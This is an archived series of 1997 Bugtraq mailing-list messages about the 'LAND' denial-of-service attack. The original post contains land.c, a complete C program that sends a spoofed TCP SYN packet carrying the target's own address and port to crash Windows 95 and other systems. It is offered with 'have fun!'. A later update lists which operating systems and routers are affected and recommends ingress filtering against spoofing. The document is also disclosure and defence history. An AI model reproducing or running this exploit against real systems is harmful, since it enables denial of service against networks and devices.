--- Begin Message ---
I tested this on a falcon running mint 1.14 pl3, mintnet 1.0 pl1 and
rlogin as the only service available. It seems to lock the machine
quite well, but ctrl-alt-del still works. As other systems have
behaved in strange ways, I'll need to test some more.
---clip---clip---
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID: <Pine.LNX.3.96.971120193920.5942A-100000@lagged.net>
Date: Thu, 20 Nov 1997 19:40:19 -0500
Reply-To: m3lt <meltman@LAGGED.NET>
From: m3lt <meltman@LAGGED.NET>
Subject: new TCP/IP bug in win95
To: BUGTRAQ@NETSPACE.ORG
hi,
i recently discovered a bug which freezes win95 boxes. here's how
it works: send a spoofed packet with the SYN flag set from a host, on an open
port (such as 113 or 139), setting as source the SAME host and port
(ie: 10.0.0.1:139 to 10.0.0.1:139). this will cause the win95 machine to lock
up.
the piece of code included in this message does that, so... have fun!
i haven't tested this bug on other platforms, i don't have the
ressources. please feel free to do so.
m3lt
meltman@lagged.net
--- snip snip -----------------------------------------------------------
/* land.c by m3lt, FLC
crashes a win95 box */
#include <stdio.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/ip_tcp.h>
#include <netinet/protocols.h>
struct pseudohdr
{
struct in_addr saddr;
struct in_addr daddr;
u_char zero;
u_char protocol;
u_short length;
struct tcphdr tcpheader;
};
u_short checksum(u_short * data,u_short length)
{
register long value;
u_short i;
for(i=0;i<(length>>1);i++)
value+=data[i];
if((length&1)==1)
value+=(data[i]<<8);
value=(value&65535)+(value>>16);
return(~value);
}
int main(int argc,char * * argv)
{
struct sockaddr_in sin;
struct hostent * hoste;
int sock;
char buffer[40];
struct iphdr * ipheader=(struct iphdr *) buffer;
struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct iphdr));
struct pseudohdr pseudoheader;
fprintf(stderr,"land.c by m3lt, FLC\n");
if(argc<3)
{
fprintf(stderr,"usage: %s IP port\n",argv[0]);
return(-1);
}
bzero(&sin,sizeof(struct sockaddr_in));
sin.sin_family=AF_INET;
if((hoste=gethostbyname(argv[1]))!=NULL)
bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length);
else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1)
{
fprintf(stderr,"unknown host %s\n",argv[1]);
return(-1);
}
if((sin.sin_port=htons(atoi(argv[2])))==0)
{
fprintf(stderr,"unknown port %s\n",argv[2]);
return(-1);
}
if((sock=socket(AF_INET,SOCK_RAW,255))==-1)
{
fprintf(stderr,"couldn't allocate raw socket\n");
return(-1);
}
bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr));
ipheader->version=4;
ipheader->ihl=sizeof(struct iphdr)/4;
ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr));
ipheader->id=htons(0xF1C);
ipheader->ttl=255;
ipheader->protocol=IP_TCP;
ipheader->saddr=sin.sin_addr.s_addr;
ipheader->daddr=sin.sin_addr.s_addr;
tcpheader->th_sport=sin.sin_port;
tcpheader->th_dport=sin.sin_port;
tcpheader->th_seq=htonl(0xF1C);
tcpheader->th_flags=TH_SYN;
tcpheader->th_off=sizeof(struct tcphdr)/4;
tcpheader->th_win=htons(2048);
bzero(&pseudoheader,12+sizeof(struct tcphdr));
pseudoheader.saddr.s_addr=sin.sin_addr.s_addr;
pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;
pseudoheader.protocol=6;
pseudoheader.length=htons(sizeof(struct tcphdr));
bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));
if(sendto(sock,buffer,sizeof(struct iphdr)+sizeof(struct tcphdr),0,(struct sockaddr *) &sin,sizeof(struct sockaddr_in))==-1)
{
fprintf(stderr,"couldn't send packet\n");
return(-1);
}
fprintf(stderr,"%s:%s landed\n",argv[1],argv[2]);
close(sock);
return(0);
}
--- snip snip -----------------------------------------------------------
From: Aleph One <aleph1@dfw.net>
Subject: Re: "LAND" Attack Update
To: BUGTRAQ@NETSPACE.ORG
Date: Fri, 21 Nov 1997 13:22:22 -0600
Reply-To: Aleph One <aleph1@dfw.net>
X-From-Line: owner-bugtraq@NETSPACE.ORG Sat Nov 22 00:37:25 1997
Received: from brimstone.netspace.org (brimstone.netspace.org [128.148.157.143]) by gfanrend.fishpool.com (8.8.7/8.6.10) with ESMTP id AAA00603 for <tjhukkan@FISHPOOL.COM>; Sat, 22 Nov 1997 00:37:13 +0200
Received: from unknown@netspace.org (port 4105 [128.148.157.6]) by brimstone.netspace.org with ESMTP id <203-10584>; Fri, 21 Nov 1997 14:41:08 -0500
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with
spool id 5789683 for BUGTRAQ@NETSPACE.ORG; Fri, 21 Nov 1997 14:39:24
-0500
Received: from brimstone.netspace.org (brimstone.netspace.org
[128.148.157.143]) by netspace.org (8.8.7/8.8.2) with ESMTP id
OAA30673 for <BUGTRAQ@NETSPACE.ORG>; Fri, 21 Nov 1997 14:38:46 -0500
Received: from unknown@netspace.org (port 4105 [128.148.157.6]) by
brimstone.netspace.org with ESMTP id <96261-10583>; Fri, 21 Nov 1997
14:38:19 -0500
Approved-By: aleph1@UNDERGROUND.ORG
Received: from dfw.dfw.net (DFW.DFW.NET [198.175.15.10]) by netspace.org
(8.8.7/8.8.2) with SMTP id OAA24104 for <BUGTRAQ@NETSPACE.ORG>; Fri,
21 Nov 1997 14:19:56 -0500
Received: from localhost by dfw.dfw.net (4.1/SMI-4.1) id AA07885; Fri, 21 Nov
97 13:22:22 CST
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID: <Pine.SUN.3.94.971121131518.2700D-100000@dfw.dfw.net>
Sender: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
X-cc: mtibodea@cisco.com
In-Reply-To: <Pine.SUN.3.94.971121011301.9521D-100000@dfw.dfw.net>
Lines: 141
Xref: gfanrend.fishpool.com bugtraq:1182
The latest update. It seems that not many versions of IOS are affected.
The symptoms can also be strange. It will stop accepting connection, then
after 30 seconds if may stop accepting processing ICMP echos, and after
that it stops forwarding packets. So if you perform the test wait a couple
of minutes and see if it still up before you come to any conclusions. Ivan
Ganev also reports that testing again port 23 alone would not kill the
router but testing againts the first 255 ports did.
>From the reports is seem to be the older revisions of IOS (10.X and 11.0)
in certain hardware configurations and the Cisco 700 Series ISDN access
routers (not running IOS) are vulnerable.
We keep getting conflicting reports for FreeBSD and OpenBSD. The are
enough reports and indications that those operating systems are indeed
vulnerable but the vulnerabilitiy may not show up in all configurations
depending on the enviroment, the intensity of cosmic rays, the phase of
the moon, and if the testing person is left or right handed.
An external "land" attack should not be an issue if you are filtering IP
address spoofing at your ingress routers. You _ARE_ doing so? Correct?
Well in case you forgot you can find Paul Ferguson's "Network Ingress
Filtering: Defeating Denial of Service Address Spoofing" Internet Draft at
ftp://ietf.org/internet-drafts/draft-ferguson-ingress-filtering-03.txt
I highly recommend you implement it's recommendations. Of curse you are
still at the mercy of those behind the filter.
The survey says:
AIX 3 IS vulnerable
AIX 3.2 NOT vulnerable
AIX 4 NOT vulnerable
AIX 4.1 NOT vulnerable
BeOS Preview Release 2 PowerMac IS vulnerable
BSDI 2.1 (vanilla) IS vulnerable
BSDI 2.1 (K210-021,K210-022,K210-024) NOT vulnerable
BSDI 3.0 NOT vulnerable
DG/UX R4.12 NOT vulnerable
Digital UNIX 4.0 NOT vulnerable
FreeBSD 2.2.2-RELEASE (confilcting reports)
FreeBSD 2.2.5-RELEASE (conflicting reports)
FreeBSD 2.2.5-STABLE (conflicting reports)
FreeBSD 3.0-CURRENT IS vulnerable
HP External JetDirect Print Servers IS vulnerable
HP-UX 10.20 IS vulnerable
IRIX 5.3 IS vulnerable
IRIX 6.2 NOT vulnerable
IRIX 6.3 NOT vulnerable
IRIX 6.4 NOT vulnerable
Linux 2.0.30 NOT vulnerable
Linux 2.0.32 NOT vulnerable
MacOS 7.5.1 NOT vulnerable
MacOS 8.0 IS vulnerable (TCP/IP stack
crashed)
MVS OS390 1.3 NOT vulnerable
AIX 4.1 NOT vulnerable
NetApp NFS server 4.3 IS vulnerable
NetBSD 1.1 IS vulnerable
NetBSD 1.2 IS vulnerable
NetBSD 1.2a IS vulnerable
NetBSD 1.2.1 IS vulnerable
NetBSD 1.3_ALPHA IS vulnerable
NeXTSTEP 3.0 IS vulnerable
NeXTSTEp 3.1 IS vulnerable
Novell 4.11 NOT vulnerable
OpenBSD 2.1 (conflicting reports)
OS/2 3.0 NOT vulnerable
QNX 4.24 IS vulnerable
OpenBSD 2.2 (Oct31) NOT vulnerable
SCO OpenServer 5.0.4 NOT vulnerable
Salaris 2.4 NOT vulnerable
Solaris 2.5.1 NOT vulnerable
Solaris 2.6 NOT vulnerable
SunOS 4.1.4 IS vulnerable
Ultrix ??? NOT vulnerable
Windows 95 (vanilla) IS vulnerable
Windows 95 + Winsock 2 + VIPUPD.EXE IS vulnerable
Windows NT (vanilla) IS vulnerable
Windows NT + SP3 IS vulnerable
Windows NT + SP3 + simptcp-fix IS vulnerable
Some misc stuff:
3Com SuperStack II IS vulnerable
Apple LaserWriter IS vulnerable
Ascend 4000 5.0Ap20 NOT vulnerable
Ascend Pipeline 50 rev 5.0Ai16 NOT vulnerable
Ascend Pipeline 50 rev 5.0Ap13 NOT vulnerable
BayNetworks MARLIN 1000 OS (0).3.024(R) NOT vulnerable
BinTec BIANCA/BRICK-XS 4.6.1 router IS vulnerable
Cisco IOS 10.3(7) IS vulnerable
Cisco IOS 11.1(13) NOT vulnerable
Cisco 1003 IOS 11.0 NOT vulnerable
Cisco 1005 IOS 11.0(4) NOT vulnerable
Cisco 1600 IOS 11.0(6) fc1 IS vulnerable
Cisco 1601 IOS 11.1(8) AA NOT vulnerable
Cisco 1601 IOS 11.1(10)AA NOT vulnerable
Cisco 2500 IOS 11.0(9) NOT vulnerable
Cisco 2500 IOS 11.1(6) fc1 IS vulnerable
Cisco 2500 IOS 11.1(10) NOT vulnerable
Cisco 2501 IOS 10.2 IS vulnerable
Cisco 2501 IOS 10.2(2) IS vulnerable
Cisco 2501 IOS 10.(7) IS vulnerable
Cisco 2501 IOS 11.1(9) NOT vulnerable
Cisco 2501 IOS 11.2(4)P NOT vulnerable
Cisco 2503 IOS 11.0(9) IS vulnerable
Cisco 2509 IOS 11.1 NOT vulnerable
Cisco 2511 IOS ??? IS vulnerable
Cisco 2511 IOS 10.3(4) NOT vulnerable
Cisco 2511 IOS 11.1(8) NOT vulnerable
Cisco 2511 IOS 11.2(4) NOT vulnerable
Cisco 2514 IOS 11.2(5) NOT vulnerable
Cisco 3102 IOS 9.X IS vulnerable
Cisco 4000 IOS 11.0(7) NOT vulnerable
Cisco 4000 IOS 11.1(6) NOT vulnerable
Cisco 4000 IOS 11.2(4) fc1 NOT vulnerable
Cisco 4000 IOS 11.2(9) NOT vulnerable
Cisco 4500 IOS 10.13(15) IS vulnerable
Cisco 4500 IOS 11.2(9) NOT vulnerable
Cisco 4700M IOS 11.0(16) NOT vulnerable
Cisco 7000 IOS 11.0(1) NOT vulnerable
Cisco 7000 IOS 11.0(16) NOT vulnerable
Cisco 7000 IOS 11.1(12) NOT vulnerable
Cisco 7000 IOS 11.2(8) NOT vulnerable
Cisco 7507 IOS 11.0(17) NOT vulnerable
Cisco 753 OS Release 4 IS vulnerable
Cisco 753 OS Release 4.0 IS vulnerable
Cisco 754 OS Release 4.1 IS vulnerable
Cisco 761 OS Release 4.0(1) IS vulnerable
Cisco Catalyst 5000 IS vulnerable
Digital VT1200 IS vulnerable
HP Envizex Terminal IS vulnerable
LaserJet Printer NOT vulnerable
Livingston Office Router (ISDN) IS vulnerable
Livingston PM ComOS 3.3.3 NOT vulnerable
Livingston PM ComOS 3.5b17 + 3.7.2 NOT vulnerable
Livingston PM ComOS 3.7L NOT vulnerable
Livingston Enterprise PM 3.4 2L NOT vulnerable
Milkyway Firewall 3.02 (SunOS) IS vulnerable
NCD X Terminals, NCDWare v3.1.0 IS vulnerable
NCD X Terminals, NCDWare v3.2.1 IS vulnerable
--- End Message ---